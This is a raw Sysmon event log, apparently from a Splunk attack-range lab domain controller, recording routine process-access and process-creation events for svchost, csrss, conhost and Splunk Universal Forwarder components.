13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-862F-5FCF-5D01-000000009101}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.542{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-862F-5FCF-5D01-000000009101}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.543{10ACEC4A-862F-5FCF-5D01-000000009101}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:03.011{10ACEC4A-862E-5FCF-5C01-000000009101}43643040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-8630-5FCF-5E01-000000009101}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8630-5FCF-5E01-000000009101}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8630-5FCF-5E01-000000009101}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:04.901{10ACEC4A-8630-5FCF-5E01-000000009101}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.713{10ACEC4A-8631-5FCF-6001-000000009101}4744604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-8631-5FCF-6001-000000009101}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 